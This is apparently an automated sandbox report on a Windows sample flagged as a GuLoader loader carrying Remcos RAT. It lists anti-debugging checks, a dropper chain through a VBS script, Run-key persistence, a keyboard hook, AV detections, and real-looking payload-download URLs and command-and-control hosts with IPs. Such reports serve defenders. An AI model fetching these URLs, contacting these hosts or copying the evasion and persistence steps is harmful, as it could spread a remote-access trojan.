            Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\mU9H96igb3.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\mU9H96igb3.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BFFBA1 rdtsc
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF46A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02C01BCE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BFC054 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BFE990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_0057C054 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_005746A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_00581BCE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_0057E990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C246A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C31BCE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C2C054 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 15_2_02C2E990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F646A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F6C054 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F71BCE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 17_2_04F6E990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0235C054 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_023546A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_0235E990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 18_2_02361BCE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_0057C054 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_005746A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_00581BCE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 20_2_0057E990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_0057C054 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_005746A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_00581BCE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeCode function: 21_2_0057E990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 2_2_02BF742D LdrInitializeThunk,
            Source: C:\Users\user\Desktop\mU9H96igb3.exeCode function: 9_2_0058474A RtlAddVectoredExceptionHandler,
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'
            Source: C:\Users\user\Desktop\mU9H96igb3.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exeProcess created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'
            Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmpBinary or memory string: Program ManagerCJBCA\D
            Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmpBinary or memory string: Program Manager#
            Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmpBinary or memory string: Program ManagerCJB
            Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmpBinary or memory string: Program ManagerCJBCA\
            Source: Dlls.exe, 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmpBinary or memory string: [ Program Manager ]
            Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmpBinary or memory string: Program Managerr|
            Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmpBinary or memory string: Program Manager2
            Source: Dlls.exe, 00000013.00000002.142216216346.00000000008D9000.00000004.00000020.sdmpBinary or memory string: |Program Manager|
            Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmpBinary or memory string: Program Manager~
            Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmpBinary or memory string: Program Manager|
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR
            GuLoader behavior detectedShow sources
            Source: Initial fileSignature Results: GuLoader behavior

            Remote Access Functionality:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR
            Detected Remcos RATShow sources
            Source: Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmpString found in binary or memory: Remcos_Mutex_Inj
            Source: Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmpString found in binary or memory: Remcos_Mutex_InjJ

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScripting11Registry Run Keys / Startup Folder11Process Injection12Masquerading1Input Capture11Security Software Discovery421Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobDLL Side-Loading1Registry Run Keys / Startup Folder11Virtualization/Sandbox Evasion23LSASS MemoryVirtualization/Sandbox Evasion23Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol112Jamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1662 Sample: mU9H96igb3.exe Startdate: 14/10/2021 Architecture: WINDOWS Score: 100 48 implantecapilarpereira.com 2->48 50 Venonletmonitprradministratioran.loseyourip.com 2->50 64 Potential malicious icon found 2->64 66 Found malware configuration 2->66 68 Antivirus / Scanner detection for submitted sample 2->68 70 10 other signatures 2->70 11 mU9H96igb3.exe 2->11         started        14 Dlls.exe 2->14         started        16 Dlls.exe 2->16         started        18 Dlls.exe 2->18         started        signatures3 process4 signatures5 84 Tries to detect Any.run 11->84 86 Hides threads from debuggers 11->86 20 mU9H96igb3.exe 6 11 11->20         started        25 Dlls.exe 6 14->25         started        27 Dlls.exe 6 16->27         started        process6 dnsIp7 52 implantecapilarpereira.com 83.167.224.147, 49804, 49808, 49810 MASTER-ASCzechRepublicwwwmasterczCZ Czech Republic 20->52 42 C:\Users\user\AppData\Roaming\...\Dlls.exe, PE32 20->42 dropped 44 C:\Users\user\...\Dlls.exe:Zone.Identifier, ASCII 20->44 dropped 46 C:\Users\user\AppData\Local\...\install.vbs, data 20->46 dropped 72 Creates an undocumented autostart registry key 20->72 74 Tries to detect Any.run 20->74 76 Hides threads from debuggers 20->76 29 wscript.exe 1 20->29         started        file8 signatures9 process10 process11 31 cmd.exe 1 29->31         started        process12 33 Dlls.exe 31->33         started        36 conhost.exe 31->36         started        signatures13 56 Antivirus detection for dropped file 33->56 58 Multi AV Scanner detection for dropped file 33->58 60 Tries to detect Any.run 33->60 62 Hides threads from debuggers 33->62 38 Dlls.exe 2 9 33->38         started        process14 dnsIp15 54 Venonletmonitprradministratioran.loseyourip.com 8.6.8.23, 24091, 49809 AS-CHOOPAUS United States 38->54 78 Tries to detect Any.run 38->78 80 Hides threads from debuggers 38->80 82 Installs a global keyboard hook 38->82 signatures16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            mU9H96igb3.exe33%VirustotalBrowse
            mU9H96igb3.exe26%MetadefenderBrowse
            mU9H96igb3.exe24%ReversingLabsWin32.Trojan.Mucc
            mU9H96igb3.exe100%AviraTR/AD.Nekark.fexqx

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\Adobes\Dlls.exe100%AviraTR/AD.Nekark.fexqx
            C:\Users\user\AppData\Roaming\Adobes\Dlls.exe26%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\Adobes\Dlls.exe24%ReversingLabsWin32.Trojan.Mucc

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            21.0.Dlls.exe.400000.0.unpack100%AviraTR/AD.Nekark.fexqxDownload File
            16.0.Dlls.exe.400000.0.unpack100%AviraTR/AD.Nekark.fexqxDownload File
            19.0.Dlls.exe.400000.0.unpack100%AviraTR/AD.Nekark.fexqxDownload File
            16.2.Dlls.exe.400000.0.unpack100%AviraTR/AD.Nekark.fexqxDownload File
            17.0.Dlls.exe.400000.0.unpack100%AviraTR/AD.Nekark.fexqxDownload File
            18.0.Dlls.exe.400000.0.unpack100%AviraTR/AD.Nekark.fexqxDownload File
            2.0.mU9H96igb3.exe.400000.0.unpack100%AviraTR/AD.Nekark.fexqxDownload File
            9.0.mU9H96igb3.exe.400000.0.unpack100%AviraTR/AD.Nekark.fexqxDownload File
            15.0.Dlls.exe.400000.0.unpack100%AviraTR/AD.Nekark.fexqxDownload File
            20.0.Dlls.exe.400000.0.unpack100%AviraTR/AD.Nekark.fexqxDownload File

            Domains

            SourceDetectionScannerLabelLink
            Venonletmonitprradministratioran.loseyourip.com4%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binx0%Avira URL Cloudsafe
            http://implantecapilarpereira.com/NetGen0%Avira URL Cloudsafe
            http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bint0%Avira URL Cloudsafe
            http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarperei0%Avira URL Cloudsafe
            monitprradministratioran.loseyourip.com0%Avira URL Cloudsafe
            http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binn0%Avira URL Cloudsafe
            http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin0%Avira URL Cloudsafe
            http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binHR0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            Venonletmonitprradministratioran.loseyourip.com
            8.6.8.23
            truetrueunknown
            implantecapilarpereira.com
            83.167.224.147
            truetrue
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://implantecapilarpereira.com/NetGentrue
              • Avira URL Cloud: safe
              unknown
              monitprradministratioran.loseyourip.comtrue
              • Avira URL Cloud: safe
              unknown
              http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binfalse
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binxmU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bintmU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarpereimU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binnDlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binHRDlls.exe, 00000014.00000002.139080944862.00000000007B4000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              unknown

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              8.6.8.23
              Venonletmonitprradministratioran.loseyourip.comUnited States
              20473AS-CHOOPAUStrue
              83.167.224.147
              implantecapilarpereira.comCzech Republic
              24971MASTER-ASCzechRepublicwwwmasterczCZtrue

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:1662
              Start date:14.10.2021
              Start time:08:35:48
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 13m 5s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:mU9H96igb3.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Run name:Suspected Instruction Hammering
              Number of analysed new started processes analysed:28
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.rans.troj.spyw.evad.winEXE@19/4@2/2
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 56%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
              • TCP Packets have been reduced to 100
              • Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.50.102.62, 92.123.195.35, 92.123.195.73, 93.184.221.240, 20.82.210.154
              • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, wu-shim.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, wd-prod-cp.trafficmanager.net, arc.msn.com, wu.azureedge.net, wdcpalt.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              08:39:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome "C:\Users\user\AppData\Roaming\Adobes\Dlls.exe"
              08:39:09AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome "C:\Users\user\AppData\Roaming\Adobes\Dlls.exe"
              08:39:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome "C:\Users\user\AppData\Roaming\Adobes\Dlls.exe"

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              8.6.8.23E5onSB0pfg.exeGet hashmaliciousBrowse
                D8oUzPUNCR.exeGet hashmaliciousBrowse
                  4KGPfYWyyJ.exeGet hashmaliciousBrowse

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    Venonletmonitprradministratioran.loseyourip.comE5onSB0pfg.exeGet hashmaliciousBrowse
                    • 8.6.8.23
                    D8oUzPUNCR.exeGet hashmaliciousBrowse
                    • 8.6.8.23
                    4KGPfYWyyJ.exeGet hashmaliciousBrowse
                    • 8.6.8.23
                    GT7LdgfsBD.exeGet hashmaliciousBrowse
                    • 77.247.127.169

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    AS-CHOOPAUS8h5TwcAsZiGet hashmaliciousBrowse
                    • 216.155.164.0
                    b3astmode.arm7Get hashmaliciousBrowse
                    • 167.179.103.219
                    SecuriteInfo.com.Trojan.Linux.Generic.191302.28689.5288Get hashmaliciousBrowse
                    • 45.76.137.101
                    E5onSB0pfg.exeGet hashmaliciousBrowse
                    • 8.6.8.23
                    SecuriteInfo.com.Linux.DownLoader.16.15940.30355Get hashmaliciousBrowse
                    • 45.77.236.135
                    SecuriteInfo.com.PUA.Tool.Linux.BtcMine.2700.1790.8083Get hashmaliciousBrowse
                    • 104.238.133.105
                    SecuriteInfo.com.PUA.Tool.Linux.BtcMine.2743.28638.31741Get hashmaliciousBrowse
                    • 141.164.39.23
                    frj4kNTbl3.exeGet hashmaliciousBrowse
                    • 144.202.38.53
                    Order EQE090.xlsxGet hashmaliciousBrowse
                    • 8.6.8.108
                    sora.armGet hashmaliciousBrowse
                    • 45.32.230.28
                    D8oUzPUNCR.exeGet hashmaliciousBrowse
                    • 8.6.8.23
                    g1HhCw96xhGet hashmaliciousBrowse
                    • 66.42.42.75
                    nfmAUVANYAGet hashmaliciousBrowse
                    • 149.248.33.79
                    P2AN3Yrtnz.exeGet hashmaliciousBrowse
                    • 144.202.38.53
                    Pa4gjPt0LW.exeGet hashmaliciousBrowse
                    • 144.202.38.53
                    4KGPfYWyyJ.exeGet hashmaliciousBrowse
                    • 8.6.8.23
                    ppuXvHPso0.dllGet hashmaliciousBrowse
                    • 45.76.176.10
                    ppuXvHPso0.dllGet hashmaliciousBrowse
                    • 45.76.176.10
                    TNIZtb3HS3.exeGet hashmaliciousBrowse
                    • 144.202.76.47
                    setup_x86_x64_install.exeGet hashmaliciousBrowse
                    • 144.202.76.47
                    MASTER-ASCzechRepublicwwwmasterczCZcvWFjfKtdHGet hashmaliciousBrowse
                    • 37.205.15.222
                    tgduMePOh0.exeGet hashmaliciousBrowse
                    • 185.239.222.252
                    RpcNs4.exeGet hashmaliciousBrowse
                    • 37.205.9.252
                    8YvgZNbOUh.exeGet hashmaliciousBrowse
                    • 185.239.222.241
                    NtA6ABwq75.exeGet hashmaliciousBrowse
                    • 185.239.222.244
                    aFxrnP3GU4Get hashmaliciousBrowse
                    • 185.25.184.6
                    zfpLjnr5P9.exeGet hashmaliciousBrowse
                    • 185.239.222.250
                    lHCBcjZBib.exeGet hashmaliciousBrowse
                    • 185.239.222.241
                    Cx1HKT0xhO.exeGet hashmaliciousBrowse
                    • 185.239.222.244
                    2dv5TkS2quGet hashmaliciousBrowse
                    • 37.205.15.252
                    Z9GkJvygEk.exeGet hashmaliciousBrowse
                    • 185.239.222.252
                    Purchase Order.exeGet hashmaliciousBrowse
                    • 178.238.47.153
                    UBHfmKPqlV.exeGet hashmaliciousBrowse
                    • 185.239.222.252
                    jTI7J7BCUj.exeGet hashmaliciousBrowse
                    • 185.239.222.254
                    mOLAwgknt0Get hashmaliciousBrowse
                    • 37.205.15.226
                    Order List.exeGet hashmaliciousBrowse
                    • 178.238.47.16
                    kb5IbEJU8cGet hashmaliciousBrowse
                    • 85.118.166.155
                    8wzyljMmmnGet hashmaliciousBrowse
                    • 80.79.25.108
                    kung.xlsxGet hashmaliciousBrowse
                    • 178.238.47.18
                    1Ptfo0FZUMT7hlK.exeGet hashmaliciousBrowse
                    • 178.238.47.21

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    C:\Users\user\AppData\Roaming\Adobes\Dlls.exedestinations.xlsxGet hashmaliciousBrowse

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\install.vbs
                      Process:C:\Users\user\Desktop\mU9H96igb3.exe
                      File Type:data
                      Category:modified
                      Size (bytes):528
                      Entropy (8bit):3.5356300796578033
                      Encrypted:false
                      SSDEEP:12:4D8o++ugypjBQMB3DAd9ZvFQ4lO7MJOF0M/0aimi:4Dh+SMT+9hFNOA8F0Nait
                      MD5:2E07157ACD04EED9996FD7601E5D3E21
                      SHA1:1CF8E3A7A14770FCB468DE21B727ACBF197AAF04
                      SHA-256:58D762754316709B3F0FA11A875298A413CD5FDFA322DAA7638D93318C175FEE
                      SHA-512:6A578DD250346FAF928D90B145725598AC4B984CC43EB4543390B5109A07E33797EA7602439002B993848CD8C577B0945864DADDC23CDABFEEA070458B990FE7
                      Malicious:true
